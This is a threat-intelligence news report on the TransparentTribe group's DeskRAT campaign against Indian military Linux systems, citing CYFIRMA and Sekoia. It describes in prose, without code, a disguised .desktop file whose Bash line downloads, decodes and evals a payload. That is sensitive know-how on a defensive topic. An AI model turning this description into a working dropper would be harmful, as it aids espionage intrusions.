The Pakistani-linked hacking group TransparentTribe has escalated its cyber espionage by targeting Linux-based systems in Indian military organizations with a new Golang-based remote access trojan called DeskRAT. The campaign, traced back to June 2025, uses sophisticated phishing tactics to deliver the malware. This development highlights the group's advancing technical capabilities amid regional tensions.
TransparentTribe, an intrusion set linked to Pakistan and active since at least 2013, has intensified its operations against Indian defense targets. The campaign was first documented by CYFIRMA in July 2025, with initial activity dating to June 2025. Sekoia analysts later identified updated samples in August and September 2025, revealing an evolved infection chain that the group has refined to evade detection.
The attacks begin with phishing emails containing ZIP archives disguised with names like “MoM_regarding_Defence_Sectors_by_Secy_Defence”. Extracting the archive yields a DESKTOP file that appears as a legitimate PDF, complete with a PDF icon. Upon execution, this file employs advanced obfuscation: malicious Bash commands are hidden within thousands of lines of commented PNG image data, with the key [Desktop Entry] section buried between large blocks of this data.
The Bash one-liner creates a unique filename in the /tmp/ directory using a timestamp, then uses curl to download an encoded binary from a remote staging server. The payload undergoes hexadecimal conversion via xxd and Base64 decryption before execution through eval. To maintain deception, Firefox opens a decoy PDF from the attackers' server, masking the malware's installation.
DeskRAT, written in Golang for cross-platform compatibility, establishes persistent access via WebSocket connections for command and control. The infrastructure has shifted from hosting ZIP files on services like Google Drive to dedicated staging servers, showing improved operational security. Sekoia implemented YARA rules to detect these activities, uncovering samples unknown to other vendors and underscoring TransparentTribe's efforts to outpace defenses in Indian military Linux environments.